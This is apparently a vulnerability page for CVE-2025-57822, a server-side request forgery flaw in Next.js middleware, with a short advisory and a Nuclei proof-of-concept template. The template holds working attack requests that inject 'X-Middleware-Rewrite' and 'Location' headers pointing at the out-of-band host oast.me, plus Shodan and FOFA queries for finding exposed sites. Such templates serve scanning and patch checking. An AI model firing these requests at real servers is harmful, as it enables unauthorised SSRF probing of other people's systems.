漏洞描述
In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.
CVE-2025-57822: Next.js Middleware - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2025-57822
info:
name: Next.js Middleware - Server-Side Request Forgery
author: prdngr,nicolas-latacora
severity: medium
description: |
In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.
reference:
- https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
- https://vercel.com/changelog/cve-2025-57822
- https://nvd.nist.gov/vuln/detail/CVE-2025-57822
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-57822
epss-score: 0.05854
epss-percentile: 0.90206
cwe-id: CWE-918
metadata:
verified: true
vendor: vercel
product: next.js
shodan-query:
- cpe:"cpe:2.3:a:zeit:next.js"
- http.html:"/_next/static"
fofa-query:
- body="/_next/static"
tags: cve,cve2025,ssrf,nextjs,oast,oob
variables:
cache-buster: "{{rand_text_alpha(10)}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 3
matchers:
- type: word
part: body
words:
- "_next/static"
internal: true
- method: GET
path:
- "{{BaseURL}}/?cb={{cache-buster}}"
headers:
Location: "https://oast.me"
X-Middleware-Rewrite: "https://oast.me"
host-redirects: true
max-redirects: 3
matchers:
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a0047304502206c331330865467d92bafdcb22ff76c508b18c52d38188c3a11431fbf29134b6a022100be0166f98da898c8e2b3cf98c5e0f87f2f0ddace12585b16a2fe0100b8105984:922c64590222798bb761d5b6d8e72950